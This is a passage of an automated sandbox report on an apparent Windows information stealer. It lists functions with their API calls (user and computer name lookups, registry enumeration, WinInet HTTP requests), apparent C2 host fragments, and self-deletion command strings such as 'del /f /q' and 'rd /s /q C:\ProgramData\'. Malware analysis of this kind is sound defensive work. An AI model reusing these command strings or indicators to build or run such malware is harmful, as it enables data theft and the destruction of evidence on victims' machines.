                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B441B971D4022D7ADB24EB61EC4BFDD7778AB08304F1444AAB605F70D1DAB8AB848F59
                                                                                                                                                                                                                            Function 0040ABBA Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC5F
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD69
                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD70
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004373D4,00000000), ref: 0040AE21
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004373D8), ref: 0040AE49
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AE6D
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373DC), ref: 0040AE79
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AE83
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373E0), ref: 0040AE8F
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AE99
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA5
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAF
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBB
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC5
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED1
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDB
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE7
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF1
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFD
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040AF4F
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040AF6A
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040AFAD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1956182324-0
                                                                                                                                                                                                                            • Opcode ID: 1969370fe5d766ed8fae6fec07b2a4e8d94643813e69ebe2ca72e66b7174e537
                                                                                                                                                                                                                            • Instruction ID: a1bbec3347a3a128a7b507e9df3142849c92e8e8a29d79e5ebaa2b33eb0b59c6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1969370fe5d766ed8fae6fec07b2a4e8d94643813e69ebe2ca72e66b7174e537
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68C14E32904209ABDF15FBA1ED4A9DD7B76EF04305F10502AF501B30B2DBB96E859B89
                                                                                                                                                                                                                            Function 00417083 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00410C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C34
                                                                                                                                                                                                                              • Part of subcall function 00410C28: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C3B
                                                                                                                                                                                                                              • Part of subcall function 00410C28: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C4F
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,004185D1), ref: 0041711F
                                                                                                                                                                                                                            • OpenEventA.KERNEL32(001F0003,00000000,?,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041712E
                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,004366D6), ref: 0041764C
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 0041770D
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00417726
                                                                                                                                                                                                                              • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                                                                                              • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                                                                                              • Part of subcall function 00413A02: StrCmpCA.SHLWAPI(?,block,?,?,00417786), ref: 00413A17
                                                                                                                                                                                                                              • Part of subcall function 00413A02: ExitProcess.KERNEL32 ref: 00413A22
                                                                                                                                                                                                                              • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                                                                                              • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                                                                                              • Part of subcall function 004131D8: strtok_s.MSVCRT ref: 004131F7
                                                                                                                                                                                                                              • Part of subcall function 004131D8: strtok_s.MSVCRT ref: 0041327A
                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00417ADC
                                                                                                                                                                                                                              • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                                                                                              • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                                                                                              • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,004185D1), ref: 00417142
                                                                                                                                                                                                                              • Part of subcall function 00412554: __EH_prolog3_catch_GS.LIBCMT ref: 0041255E
                                                                                                                                                                                                                              • Part of subcall function 00412554: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E73,.exe,00436CD4,00436CD0,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC), ref: 0041257D
                                                                                                                                                                                                                              • Part of subcall function 00412554: Process32First.KERNEL32(00000000,00000128), ref: 0041258D
                                                                                                                                                                                                                              • Part of subcall function 00412554: Process32Next.KERNEL32(00000000,00000128), ref: 0041259F
                                                                                                                                                                                                                              • Part of subcall function 00412554: StrCmpCA.SHLWAPI(?), ref: 004125B1
                                                                                                                                                                                                                              • Part of subcall function 00412554: CloseHandle.KERNEL32(00000000), ref: 004125C5
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00418042
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                                                                            • String ID: .exe$.exe$0b3bd69430b7d827b107ba2ed809207d$_DEBUG.zip$cowod.$hopto$http://$org
                                                                                                                                                                                                                            • API String ID: 305159127-3642742264
                                                                                                                                                                                                                            • Opcode ID: f6d7053e733674245ef1cdd8f6d089b2bf2fa6d3358bc3ba76893411eb2cc9bc
                                                                                                                                                                                                                            • Instruction ID: 8df2a6c4b46c73ca4ddf54cc8c0bb9bb361c8bd8d3ae006cdaff17597551342b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6d7053e733674245ef1cdd8f6d089b2bf2fa6d3358bc3ba76893411eb2cc9bc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3923E715083459BC620FF25D94268EB7E1FF84708F51482FF58477191DBB8AA8E8B8B
                                                                                                                                                                                                                            Function 004135E8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0041362A
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,true), ref: 004136EC
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrlenA.KERNEL32(?,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410524
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrcpyA.KERNEL32(00000000,00000000,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410556
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 004137AE
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 004137DF
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 0041381B
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 00413857
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 00413893
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 004138CF
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,00000000), ref: 0041390B
                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 004139CF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                                            • String ID: false$true
                                                                                                                                                                                                                            • API String ID: 2116072422-2658103896
                                                                                                                                                                                                                            • Opcode ID: f5d0ab9b180171e2259bdd84d25315b637cbf501645ae5f4d352ab184134a0b5
                                                                                                                                                                                                                            • Instruction ID: 4b9006c81de5cbe442b288e1576c32e24171c8e14767bb27393f0de91e811dc5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5d0ab9b180171e2259bdd84d25315b637cbf501645ae5f4d352ab184134a0b5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8B138B59002189BCF60EF64DC89ADA77B5BF18305F0001EAE549A72A1DB75AFD4CF44
                                                                                                                                                                                                                            Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004012A7
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004012B6
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                                                                                                                                              • Part of subcall function 00410C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C66
                                                                                                                                                                                                                              • Part of subcall function 00410C5A: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C6D
                                                                                                                                                                                                                              • Part of subcall function 00410C5A: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410C81
                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1553874529-0
                                                                                                                                                                                                                            • Opcode ID: 927124d3e7746fc297e5f2fe29e5e0df559b15ca6c40b02dbd458cf132794fcb
                                                                                                                                                                                                                            • Instruction ID: 4641dc2a71a7f36ffdc22951e019d2d4c0538419c1ec9b6f3a97985c37de70f2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 927124d3e7746fc297e5f2fe29e5e0df559b15ca6c40b02dbd458cf132794fcb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB4185B2E4422C66DB20DB719C59FDB7BAC9F14710F5005A3A8D8F3181D67C9A88CB98
                                                                                                                                                                                                                            Function 004111D8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670E,00000000,?,?), ref: 00411248
                                                                                                                                                                                                                            • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00411285
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004112B2
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112D1
                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411307
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0041131C
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E94), ref: 004113B1
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041141B
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041143B
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00411447
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                                                            • String ID: - $%s\%s$?
                                                                                                                                                                                                                            • API String ID: 2394436309-3278919252
                                                                                                                                                                                                                            • Opcode ID: 137f9a5c3c5069f07d9af57b08a0430e085017ea7b5abc5e6f1b491645986798
                                                                                                                                                                                                                            • Instruction ID: 1a7e4b7b75ff4232c8cdaa0c3999b5666d708685d756b362eb3ad491a7b64724
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 137f9a5c3c5069f07d9af57b08a0430e085017ea7b5abc5e6f1b491645986798
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A561077590022CABEF21DF15DD84ECAB7B9AB04704F1082E6A608B2161DF756FC9CF54
                                                                                                                                                                                                                            Function 004182B3 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004182D8
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004182E7
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182FC
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • ShellExecuteEx.SHELL32(?), ref: 00418498
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004184A7
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004184B9
                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 004184C9
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 004183D2
                                                                                                                                                                                                                            • " & rd /s /q "C:\ProgramData\, xrefs: 00418375
                                                                                                                                                                                                                            • /c timeout /t 10 & del /f /q ", xrefs: 00418327
                                                                                                                                                                                                                            • " & exit, xrefs: 004183CB
                                                                                                                                                                                                                            • " & exit, xrefs: 0041841C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
